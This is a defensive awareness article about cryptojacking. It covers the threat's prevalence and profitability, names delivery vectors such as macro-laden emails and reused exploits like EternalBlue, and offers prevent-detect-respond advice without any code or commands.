Illegal cryptocurrency mining

Adopting the right approach to these types of threats

The cryptocurrency mining has grown considerably in recent years. According to reports of cybersecurity and digital forensics specialists from the International Institute of Cyber Security, one out of every 500 sites (from a list of the million most visited websites) contains scripts to mine without the user’s consent, in what is known as cryptojacking.

Cryptojacking can generate disastrous consequences for its victims, such as the weakening and death of infected computers and smartphones, due to CPU overhead, exploiting them beyond their capabilities, as well as excessive increments in electric power using. A device attacked with cryptojacking sees its productivity reduced (including its critical operations) as the system performance degrades considerably. This attack could also compromise the security of the confidential data stored on the affected systems.

Some specialists in digital forensics believe that the most frightening thing about cryptojacking is that it can go unnoticed for long periods of time. Any endpoint is at risk, so it’s worth asking: how to protect our endpoints from the effects of cryptojacking?

Why do cybercriminals feel so tempted to carry out cryptojacking attacks? Unlike the ransomware, the cryptocurrency mining is stealthier and can be really difficult to detect, it also eliminates the hassle of demanding victims for a ransom. The mining can represent a constant source of income for hackers, especially when thousands of systems are attacked together.

An average device can generate about 0.25 dollars a day. It may not seem like much, but that figure changes when systems are attacked in a massive way. The gains increase according to the hash rate (the speed at which a particular mining machine operates) and the increase in the consumption of electric energy. In a cryptojacking campaign analyzed by a digital forensics firm, attackers generated about $704 USD a day ($257k USD in a year) using vulnerable endpoints. Five other related campaigns were discovered simultaneously, accumulating a total of over $1M USD. Given the little awareness of these kinds of problems, it is very likely that these massive attack campaigns will continue to be present in the future.

Attack vectors

Email: In the past an attacker launched a campaign via email falsifying a job application. The email contained a Word document that appeared to be a CV, which led the victims to enable macro content, thus initiating the download of Monero mining software.

Exploits: It has been seen that hackers exploit vulnerabilities in developments such as Adobe Flash, while others use malware delivery channels such as Smokeloader. The most significant thing about this exploit is its ability to run for months (even years) on infected systems. In addition, known exploits, such as EternalBlue, used to exploit vulnerabilities in SMEs for the well-known WannaCry campaign, are now being used to deploy cryptojacking software.

Other variants: Hackers also resort to other pathways of infection such as injecting code by exploiting browser plugins, reliable system processes, and websites that incorporate JavaScript. This allows mining while using the browser.

Avoid being victims of cryptojacking

Digital forensics specialists provide some tips to address this problem in the best possible way.

Prevent: Blocking and preventing difficult-to-detect mining threats before they reach our endpoints is essential. This is possible by taking advantage of several preventive engines that go beyond the traditional antivirus, and applying advanced capacities like exploit prevention, and the advanced sandboxing.

Detect: We know that the danger cannot be completely avoided. Therefore, it is important to have visibility of what happens after a file has successfully entered an environment. This is possible by continuously monitoring and analyzing the command line, file and process activity at each endpoint.

Respond: When the cryptojacking is detected, it is forced to respond quickly to contain the threat. Automated responses block malicious connections that emanate from all endpoints. This approach minimizes the risks of any collateral damage.